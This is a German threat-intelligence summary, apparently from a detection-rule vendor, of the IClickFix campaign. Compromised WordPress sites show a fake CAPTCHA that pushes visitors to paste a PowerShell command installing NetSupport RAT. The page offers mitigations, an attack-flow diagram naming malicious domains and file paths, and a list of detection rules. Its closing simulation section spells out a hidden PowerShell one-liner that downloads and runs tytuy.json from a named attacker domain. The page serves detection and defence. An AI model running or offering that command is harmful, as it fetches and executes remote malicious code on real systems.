Lernen Sie IClickFix kennen: Ein weit verbreitetes WordPress-Framework, das die ClickFix-Taktik nutzt
Folgen
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Der Bericht beschreibt IClickFix, ein bösartiges JavaScript-Framework, das WordPress-Seiten kompromittiert und ein gefälschtes Cloudflare-Drehkreuz-ähnliches CAPTCHA präsentiert. Der Köder zwingt Besucher dazu, einen PowerShell-Befehl auszuführen, der herunterlädt und installiert NetSupport RAT. Die Zustellung wird durch ein Verkehrsumverteilungssystem unterstützt, das um den YOURLS URL-Kürzer und eine rotierende Gruppe von Redirector-Domains aufgebaut ist. Forscher beobachteten seit Ende 2024 weltweit mehr als 3.800 kompromittierte WordPress-Seiten, die diese Kette bedienen.
Untersuchung
Sekoia-Analysten identifizierten das injizierte JavaScript-Tag ic-tracker-js auf kompromittierten Seiten und rekonstruierten dann den Umleitungsablauf über mehrere kurzlebige Domains. Sie erfassten das genaue PowerShell-Ausführungsmuster, das verwendet wurde, um die endgültige Nutzlast abzurufen, und stellten die abgeworfenen NetSupport RAT-Komponenten zusammen mit zugehörigen C2-Infrastrukturindikatoren wieder her.
Minderung
Überwachen Sie Webinhalte auf die ic-tracker-js Injektion und blockieren Sie bekannte bösartige Domains, Umleiter und Kurz-Links-Dienste, die in der Kette verwendet werden. Auf Endgeräten erkennen Sie PowerShell-Download-und-Ausführungs-Muster, die mit dem ClickFix-Köder übereinstimmen. Ergänzen Sie den Schutz um die Erstellung von NetSupport-Clientdateien und die Persistenz über user-level Run Registry-Schlüssel.
Antwort
Wenn Indikatoren auftreten, isolieren Sie das Endgerät, stoppen Sie den aktiven PowerShell-Prozess und entfernen Sie NetSupport-Binärdateien sowie jegliche Registry-basierte Persistenz. Führen Sie anschließend eine vollständige forensische Prüfung durch, um sicherzustellen, dass der Angreifer keine zusätzlichen Implantate eingesetzt oder sekundäre Zugangspfade eingerichtet hat.
graph TB %% Class Definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef file fill:#cccccc %% Action Nodes action_initial_access[„<b>Aktion</b> – <b>T1190 Ausnutzung öffentlich zugänglicher Anwendungen</b><br/>Kompromittierung von WordPress-Websites durch Ausnutzung von Schwachstellen im Core oder in verbreiteten Plugins (Elementor, WooCommerce, Gravity Forms).“] class action_initial_access action action_content_injection[„<b>Aktion</b> – <b>T1659 Inhaltsinjektion</b><br/>Einschleusen von bösartigem JavaScript mit dem Tag <i>icu2011trackeru2011js</i> in kompromittierte Seiten, um vom Angreifer kontrollierte Skripte nachzuladen.“] class action_content_injection action action_software_extensions[„<b>Aktion</b> – <b>T1176 Software-Erweiterungen</b><br/>Missbrauch verwundbarer WordPress-Plugins als Erweiterungen zur Persistenz des Schadcodes auf der Website.“] class action_software_extensions action action_dynamic_resolution[„<b>Aktion</b> – <b>T1568 Dynamische Auflösung</b><br/>Verwendung des YOURLS-URL-Shorteners und einer Domain-Kette (z. B. ksfldfklskdmbxcvb.com) zur Auflösung und Auslieferung von Payloads unter gleichzeitiger Bot-Filterung.“] class action_dynamic_resolution action action_obfuscated_payloads[„<b>Aktion</b> – <b>T1027 Verschleierte oder gespeicherte Dateien</b><br/>Base64-Kodierung des JavaScript der ersten Stufe und des PowerShell-Loaders sowie String-Slicing zur Umgehung von Erkennungsmechanismen.“] class action_obfuscated_payloads action action_user_execution[„<b>Aktion</b> – <b>T1204.001 Benutzerausführung: Bösartiger Link</b><br/>Opfer klicken auf die kompromittierte WordPress-URL, wodurch die Weiterleitungskette ausgelöst wird.“] class action_user_execution action action_input_injection[„<b>Aktion</b> – <b>T1674 Eingabeinjektion und T1204.004 Bösartiges Kopieren und Einfügen</b><br/>JavaScript schreibt einen PowerShell-Befehl in die Zwischenablage und zeigt einen gefälschten Cloudflare-Turnstile-CAPTCHA-Köder an.“] class action_input_injection action action_powershell[„<b>Aktion</b> – <b>T1059.001 PowerShell</b><br/>Ein versteckter PowerShell-Befehl wird ausgeführt, lädt das Skript der zweiten Stufe <i>tytuy.json</i> herunter und installiert NetSupport RAT.“] class action_powershell action action_persistence[„<b>Aktion</b> – <b>T1547.014 Autostart-Ausführung beim Systemstart oder bei Anmeldung: Active Setup</b><br/>Erstellung eines Run-Registry-Schlüssels, der auf <i>client32.exe</i> in ProgramData\\S1kCMNfZi3 verweist, um die Ausführung beim Start sicherzustellen.“] class action_persistence action action_c2[„<b>Aktion</b> – <b>T1102.002 Webdienst: Bidirektionale Kommunikation</b><br/>NetSupport RAT kommuniziert über HTTPS mit vom Angreifer kontrollierten Domains (z. B. nightlomsknies.com/fakeurl.htm).“] class action_c2 action action_data_obfuscation[„<b>Aktion</b> – <b>T1001 Datenverschleierung</b><br/>Verschleierung des Command-and-Control-Datenverkehrs und der Payloads zur Verdeckung der bösartigen Aktivität.“] class action_data_obfuscation action %% Tool / Malware / File Nodes tool_wordpress_core[„<b>Werkzeug</b> – <b>Name</b>: WordPress-Core<br/><b>Schwachstelle</b>: Remote-Code-Ausführung“] class tool_wordpress_core tool tool_elementor_plugin[„<b>Werkzeug</b> – <b>Name</b>: Elementor-Plugin<br/><b>Schwachstelle</b>: CVE-spezifische Remote-Code-Ausführung“] class tool_elementor_plugin tool tool_yourls[„<b>Werkzeug</b> – <b>Name</b>: YOURLS-Shortener<br/><b>Zweck</b>: URL-Weiterleitung und dynamische Auflösung“] class tool_yourls tool malware_netsupport[„<b>Schadsoftware</b> – <b>Name</b>: NetSupport RAT<br/><b>Fähigkeit</b>: Fernsteuerung und Datenexfiltration“] class malware_netsupport malware file_client32[„<b>Datei</b> – <b>Name</b>: client32.exe<br/><b>Speicherort</b>: ProgramData\\S1kCMNfZi3“] class file_client32 file file_tyuy_json[„<b>Datei</b> – <b>Name</b>: tytuy.json<br/><b>Zweck</b>: PowerShell-Skript der zweiten Stufe“] class file_tyuy_json file %% Connections action_initial_access –>|nutzt aus| tool_wordpress_core tool_wordpress_core –>|ermöglicht Zugriff| action_content_injection action_content_injection –>|injiziert Skript über| tool_elementor_plugin action_content_injection –>|führt zu| action_software_extensions action_software_extensions –>|persistiert über| tool_elementor_plugin action_software_extensions –>|ermöglicht| action_dynamic_resolution action_dynamic_resolution –>|verwendet| tool_yourls action_dynamic_resolution –>|liefert| action_obfuscated_payloads action_obfuscated_payloads –>|erzeugt| action_user_execution action_user_execution –>|löst aus| action_input_injection action_input_injection –>|schreibt Befehl in Zwischenablage| action_powershell action_powershell –>|lädt herunter| file_tyuy_json file_tyuy_json –>|installiert| malware_netsupport malware_netsupport –>|installiert| action_persistence action_persistence –>|erstellt| file_client32 file_client32 –>|wird beim Start ausgeführt| action_c2 malware_netsupport –>|kommuniziert mit| action_c2 action_c2 –>|verwendet| action_data_obfuscation
Angriffsablauf
Erkennungen
Download oder Upload über Powershell (via cmdline)
Ansehen
Verdächtige Dateien im öffentlichen Benutzerprofil (via file_event)
Ansehen
Die Möglichkeit der Ausführung durch versteckte PowerShell-Befehlszeilen (via cmdline)
Ansehen
Verdächtige Nutzung von Invoke-RestMethod (via powershell)
Ansehen
Mögliche NetSupport Manager-Binärdatei, die aus verdächtigem Verzeichnis ausgeführt wird (via process_creation)
Ansehen
Mögliche Persistenzpunkte [ASEPs – Software/NTUSER Hive] (via registry_event)
Ansehen
IOCs (HashSha256) zur Erkennung: Treffen Sie IClickFix: ein weit verbreitetes WordPress-gezieltes Framework, das die ClickFix-Taktik verwendet
Ansehen
IOCs (DestinationIP) zur Erkennung: Treffen Sie IClickFix: ein weit verbreitetes WordPress-gezieltes Framework, das die ClickFix-Taktik verwendet
Ansehen
IOCs (SourceIP) zur Erkennung: Treffen Sie IClickFix: ein weit verbreitetes WordPress-gezieltes Framework, das die ClickFix-Taktik verwendet
Ansehen
IClickFix Böser JavaScript-Injektions-Erkennung [Webserver]
Ansehen
PowerShell-Befehlsausführung zur Lieferung von NetSupport RAT [Windows Powershell]
Ansehen
Simulation Ausführung
Voraussetzung: Die Telemetrie- & Basislinien-Überprüfung muss bestanden sein.
-
Angriffs-Narrativ & Befehle:
Ein Gegner, der initialen Zugang zum Endpunkt hat, möchte einen dauerhaften Fuß in der Tür verschaffen, indem er den NetSupport RAT bereitstellt. Um interaktive Erkennung zu vermeiden, starten sie PowerShell im versteckten Modus ohne Profil oder Logo (
-w hidden -nop -c). Sie verwenden dannInvoke‑WebRequest(iwr) um eine bösartige JSON-Nutzlast herunterzuladen (tytuy.json), die ein PowerShell-Skript für den RAT enthält. Das Skript wird in das temporäre Verzeichnis geschrieben und überInvoke‑Expressionausgeführt. Diese genaue Befehlszeile entspricht den Zeichenfolgen, die die Sigma-Regel überwacht. -
Regressionstestskript:
# PowerShell-Einzeiler, der der Erkennungsregel entspricht $url = 'https://scottvmorton.com/tytuy.json' $out = "$env:TEMPpayload.ps1" powershell -w hidden -nop -c "iwr '$url' -OutFile $out; iex (Get-Content $out -Raw)" -
Bereinigungskommandos:
# Entfernen Sie die heruntergeladene Nutzlast und alle verbleibenden PowerShell-Prozesse Remove-Item -Path "$env:TEMPpayload.ps1" -ErrorAction SilentlyContinue Get-Process -Name powershell | Where-Object {$_.CommandLine -match 'tytuy.json'} | Stop-Process -Force